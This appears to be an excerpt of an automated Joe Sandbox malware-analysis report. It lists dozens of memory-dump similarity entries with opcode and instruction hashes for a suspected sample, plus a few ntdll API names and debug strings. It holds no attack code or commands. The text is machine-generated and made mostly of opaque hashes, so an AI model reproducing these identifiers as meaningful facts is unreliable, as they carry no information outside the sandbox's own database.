                                                      • Instruction Fuzzy Hash: 75F06572104204DFE3699F09DD44F52B7F8EB05365F96C025EA199B561D379EC40CBE4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction ID: 71c38bb5e2c70cad8ba72231e833f752fa5950e5fabe420773ca333050730ff8
                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                      • Instruction Fuzzy Hash: B9F0A039605341DBDB1ADF19D040AE97BA4FB41750B040058FC828B311D731E981DF55
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                      • Instruction ID: 0ad6f01f5fabb5719ca8e5d9930f512ed81b2ed22c03920639902e83956d6eaa
                                                      • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                      • Instruction Fuzzy Hash: F1E0D832244645ABD3212A5D8802B6B7BE5DBD47A0F15042DEB80CB950DB74DC44C7D8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa8a3236d5eac31c0be4d55759268e1e4b08c48c12a00398aa958b8bc1dd4e74
                                                      • Instruction ID: 5c5ad7a29f2b01dc27c5c5928aa80f776b3e68bb2498f9d8cbf5540c914112d7
                                                      • Opcode Fuzzy Hash: aa8a3236d5eac31c0be4d55759268e1e4b08c48c12a00398aa958b8bc1dd4e74
                                                      • Instruction Fuzzy Hash: 6AF0E575A256914FEF7AD72CE340B5277E0AF10670F0A0574D46087D12C734FC42C650
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                      • Instruction ID: 8330ba5906736a318c4f11fe2eb193b2ab123727316e8ec86173ecaa95ca33ce
                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                      • Instruction Fuzzy Hash: E9E0DF32A00610BFDB25A7998D01FDBBEBCDB94FA0F050054BA00E71D4E630DE00D690
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                      • Instruction ID: b3e255850f4b7b030b0c428e13462e57f1c123f7f3911aad7ce0781c9ec39324
                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                      • Instruction Fuzzy Hash: 2AE09B72B403509BCF298A1DC140A53B7ECDF99A64F15806DEB254B612C331F843C6D0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                                      • Instruction ID: 680a4650c292ef5062814784e9150072f8fdc3bcf498c1505d1f29020ff502f6
                                                      • Opcode Fuzzy Hash: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                                      • Instruction Fuzzy Hash: BCE09272100A549BC326BB29DD15FCA779AEB64764F014529F15597190CB34A850CB94
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                      • Instruction ID: 331158e476188b149b2147936cc902de8140df428d3da3d6734a97e926301257
                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                      • Instruction Fuzzy Hash: DEE01231010A56DFE73A6F2AD94CB96BAF1BF50711F1C8C2DA1D7165B0C7B598C1CA40
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction ID: cc240cf008e8aeb5311967299ba64434c93e19a9d5317ca721512763f7c5cb7f
                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                      • Instruction Fuzzy Hash: 55E0C2343003058FE719CF19C040BA27BB6BFD5A10F28C068A9488F605EB33E852CB40
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e75b30a34fe38bc75c0a7d4cdbcf6e1b4a6af6ae3b3d949bc1473692039ac47c
                                                      • Instruction ID: 3273ca11d2d568a64efdd7fbcd6cbbb7e1f96188ef6d82fe41c453b2df6fd0da
                                                      • Opcode Fuzzy Hash: e75b30a34fe38bc75c0a7d4cdbcf6e1b4a6af6ae3b3d949bc1473692039ac47c
                                                      • Instruction Fuzzy Hash: FED02B325810346EDB7AF11ABD06FD33AD99B44324F094CB4F74892414D554DC8592C4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction ID: 58f57d7aa300358c05ab6c892b71707eec8769a64e2b0eac52415d1aa99bc76f
                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                      • Instruction Fuzzy Hash: 1EE0C231404E25EFDB363F16DC44F9576A9FF58B10F14882AE1C10A0B4C7B4AC81CB44
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42f8a369b812e59827bcfcd9d5e1c41a899fecd46d29bf29f16ad2ddbdd41aec
                                                      • Instruction ID: 2951800ecd747d0ccfc2c4f400d9cfc64155826e34570222680cfc33e030aa3b
                                                      • Opcode Fuzzy Hash: 42f8a369b812e59827bcfcd9d5e1c41a899fecd46d29bf29f16ad2ddbdd41aec
                                                      • Instruction Fuzzy Hash: 36E08C32100564ABC211FB5DDD50F8A739AEBA4660F000125F1918B690CA20AC40CB94
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                      • Instruction ID: c174f30d911eb8ccf7d94b892b613ffd27a186445535cb34fca37e9e1a2b0c50
                                                      • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                      • Instruction Fuzzy Hash: 7CE08633111A1487D728DE18D512BB677E4EF45720F09863EA65347780C534E548C794
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction ID: 970dd3b3c8e17fb52561004913e76f8ec2b0dc8a3445bc41578d87bd48ae0a24
                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                      • Instruction Fuzzy Hash: 16D0A932204A28ABD732AA1CFC00FC333E8BB88720F060459B008CB050C3A0AC81CA84
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                      • Instruction ID: 99ad4a9cae9d4a16737c9a51ca7ed2992dede0f20f40cccc6bf74d4b35edbc6b
                                                      • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                      • Instruction Fuzzy Hash: 99E0EC759517889BDF16DF59C640F9EBBB9BB94B40F151058A1485F664C724A900CB40
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction ID: ba496ee634c882761525fbe9166fb621853a937c417ec66ffdf887267be2b772
                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                      • Instruction Fuzzy Hash: 54D02232322070D7CB3857556840FE76905EB80A90F0A006D340A93800C0058C82C2E0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                      • Instruction ID: 460564d6b5842fadf77d8cceb97f206a8717b7275f720674891e70bddd896060
                                                      • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                      • Instruction Fuzzy Hash: 65D012771D064DBBCB119F66DC01F957BA9E764BA0F445020B5048B5A0C63AE950D684
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f11686ad8715f30a5e894bcdadde83369d59e47a40fb277f7c6fa2088b1ea4d1
                                                      • Instruction ID: ccb97b03ad99cd3d6eefb2abd4ad410b99286f2f9c87e9413597452a6d7ac296
                                                      • Opcode Fuzzy Hash: f11686ad8715f30a5e894bcdadde83369d59e47a40fb277f7c6fa2088b1ea4d1
                                                      • Instruction Fuzzy Hash: 6ED0A730A01249CBEF1ECF08C612E6E36B0FB50640B40007CF74051821D325EC01C700
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                      • Instruction ID: 477a968a0da935ae8058236d77ef6dba0ccd5d185319ad2db0faab5b993d2083
                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                      • Instruction Fuzzy Hash: 4BD09235612E80CFD65ACB0CC5A4B2533E4BB84A44F8104E0E445CBB26D628E950CA00
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction ID: 86681701bcd605a77b2211518c4e26e24b2716146c1f228a5ed19d26b17d9425
                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                      • Instruction Fuzzy Hash: 9EC01232290648AFC712AB99CD01F427BA9EBA8B40F000021F2048B670C631E820EA84
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction ID: bff56f7bca8b667f83ac3c5607c5b5f703418733df1e7d047e24966c02f4e3fe
                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                      • Instruction Fuzzy Hash: 89D01236200248EFCB01DF51C890D9A776AFBD8710F108019FD19076118A75ED62DA50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction ID: a11dfc0a2422f5e358c61ebe76d35e60960afd63835eed4e6c5757aba4b4de2c
                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                      • Instruction Fuzzy Hash: C6C04C797016428FCF16DB5DD694F4577E4F744740F150890E845CB721E724E801CA11
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                                      • Instruction ID: 6ec35449439df6366f94fec8566b0ee965970dc0b6282e12473d8c69a02d0df5
                                                      • Opcode Fuzzy Hash: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                                      • Instruction Fuzzy Hash: 0E900232645800139144715859845469005A7E1301B55C021E0425554CCB148A565361
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                                      • Instruction ID: 82ccc2b3fa0c1030cfe64393dba005efcba6c4be80408e0bc750da9cd9f3b995
                                                      • Opcode Fuzzy Hash: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                                      • Instruction Fuzzy Hash: 3F90026264150043414471585904406B005A7E2301395C125A0555560CC71889559369
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                      • Instruction ID: ff12f416a7574b72802b2f7718b4ce3e5a0856b1c7c290d9faea54c10fbf0769
                                                      • Opcode Fuzzy Hash: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                                      • Instruction Fuzzy Hash: 9390023224140803D10871585904686500597D1301F55C021A6025655ED76589917231
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                      • Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
                                                      • Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                      • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                      • Instruction ID: 97877d6c91219591bd12e7d1dd2b4eac425d77bcdf2bdc6e0c3c4c335419a7e2
                                                      • Opcode Fuzzy Hash: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                      • Instruction Fuzzy Hash: F590023224544843D14471585504A46501597D1305F55C021A0065694DD7258E55B761
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                      • Instruction ID: c9c530cb973e42d95beb1f9e224c5bf2cd66ff089d1ff0983ff058172db95bbe
                                                      • Opcode Fuzzy Hash: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                      • Instruction Fuzzy Hash: 799002A2241540934504B2589504B0A950597E1201B55C026E1055560CC72589519235
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                      • Instruction ID: dc4be5a693b4d38fe544e53a4140bcc043192ba89b111bd58d33c8bb7d61e163
                                                      • Opcode Fuzzy Hash: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                      • Instruction Fuzzy Hash: 33900226261400030149B558170450B5445A7D7351395C025F1417590CC72189655321
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                      • Instruction ID: 5f2916861beb95296237e69b3f49abf2fdbefe9067a16957191b3f721cebb7a5
                                                      • Opcode Fuzzy Hash: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                      • Instruction Fuzzy Hash: EA90022224544443D10475586508A06500597D1205F55D021A1065595DC7358951A231
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                      • Instruction ID: 787a4aed12bf7886bc9b8e06d57cbdc5523ab0a3adac16be8efa15ad27a44121
                                                      • Opcode Fuzzy Hash: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                      • Instruction Fuzzy Hash: D990023228140403D145715855046065009A7D1241F95C022A0425554EC7558B56AB61
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                      • Instruction ID: 29aac188d4509ca1455d9230fb1b47e64c9571f2110d82886d50a520443d1671
                                                      • Opcode Fuzzy Hash: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                      • Instruction Fuzzy Hash: 4290023224140843D10471585504B46500597E1301F55C026A0125654DC715C9517621
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                      • Instruction ID: 78b2b9eb1fa237f2233a76ef59166e54f4543b95492a79e5a7cdf39602d61080
                                                      • Opcode Fuzzy Hash: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                      • Instruction Fuzzy Hash: 2490022264540403D14471586518706501597D1201F55D021A0025554DC7598B5567A1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                      • Instruction ID: 0030b9bab048ce429ce0b2db464ba6e72d8b04f5760cf4fb8c5a25ae1b3739fe
                                                      • Opcode Fuzzy Hash: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                      • Instruction Fuzzy Hash: C890023224140403D10471586608707500597D1201F55D421A0425558DD75689516221
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                      • Instruction ID: fe62917135f8277d9370e2283f53a642b8ca8257623bdac97aaefa987288aa54
                                                      • Opcode Fuzzy Hash: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                      • Instruction Fuzzy Hash: F590026225140043D10871585504706504597E2201F55C022A2155554CC7298D615225
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      Strings
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
